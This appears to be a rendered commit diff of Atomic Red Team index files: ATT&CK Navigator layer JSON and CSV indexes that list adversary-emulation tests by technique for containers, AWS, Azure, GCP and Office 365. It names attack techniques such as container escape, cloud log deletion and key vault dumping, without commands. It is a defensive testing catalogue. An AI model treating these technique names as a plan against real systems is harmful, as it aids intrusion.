Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-esxi.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (ESXi)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (ESXi) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- AWS - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":6,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- AWS - Create Snapshot from EBS Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1648","score":1,"enabled":true,"comment":"\n- Lambda Function Hijack\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1648/T1648.md"}]},{"techniqueID":"T1651","score":1,"enabled":true,"comment":"\n- AWS Run Command (and Control)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1651/T1651.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1550","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.001","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.001/T1550.001.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- GCP - Create Snapshot from Persistent Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Office-365)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.002","score":1,"enabled":true,"comment":"\n- Office365 - Remote Mail Collected\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.002/T1114.002.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+1 -1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/azure-ad-index.csv
-1
View File
@@ -1 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
atomics/Indexes/Indexes-CSV/containers-index.csv
-20
View File
@@ -1,20 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
discovery,T1613,Container and Resource Discovery,1,Docker Container and Resource Discovery,ea2255df-d781-493b-9693-ac328f9afc3f,sh
discovery,T1613,Container and Resource Discovery,2,Podman Container and Resource Discovery,fc631702-3f03-4f2b-8d8a-6b3d055580a1,sh
discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
privilege-escalation,T1611,Escape to Host,3,Privilege Escalation via Docker Volume Mapping,39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4,sh
execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
execution,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash
defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 discovery T1613 Container and Resource Discovery 1 Docker Container and Resource Discovery ea2255df-d781-493b-9693-ac328f9afc3f sh
3 discovery T1613 Container and Resource Discovery 2 Podman Container and Resource Discovery fc631702-3f03-4f2b-8d8a-6b3d055580a1 sh
4 discovery T1046 Network Service Discovery 9 Network Service Discovery for Containers 06eaafdb-8982-426e-8a31-d572da633caa sh
5 credential-access T1552.007 Kubernetes List Secrets 1 List All Secrets 31e794c4-48fd-4a76-aca4-6587c155bc11 bash
6 credential-access T1552.007 Kubernetes List Secrets 2 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
7 persistence T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
8 persistence T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
9 privilege-escalation T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
10 privilege-escalation T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
11 privilege-escalation T1611 Escape to Host 1 Deploy container using nsenter container escape 0b2f9520-a17a-4671-9dba-3bd034099fff sh
12 privilege-escalation T1611 Escape to Host 2 Mount host filesystem to escape privileged Docker container 6c499943-b098-4bc6-8d38-0956fc182984 sh
13 privilege-escalation T1611 Escape to Host 3 Privilege Escalation via Docker Volume Mapping 39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4 sh
14 execution T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
15 execution T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
16 execution T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
17 execution T1609 Kubernetes Exec Into Container 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
18 execution T1609 Kubernetes Exec Into Container 2 Docker Exec Into Container 900e2c49-221b-42ec-ae3c-4717e41e6219 bash
19 defense-evasion T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
20 defense-evasion T1612 Build Image on Host 1 Build Image On Host 2db30061-589d-409b-b125-7b473944f9b3 sh

Some files were not shown because too many files have changed in this diff Show More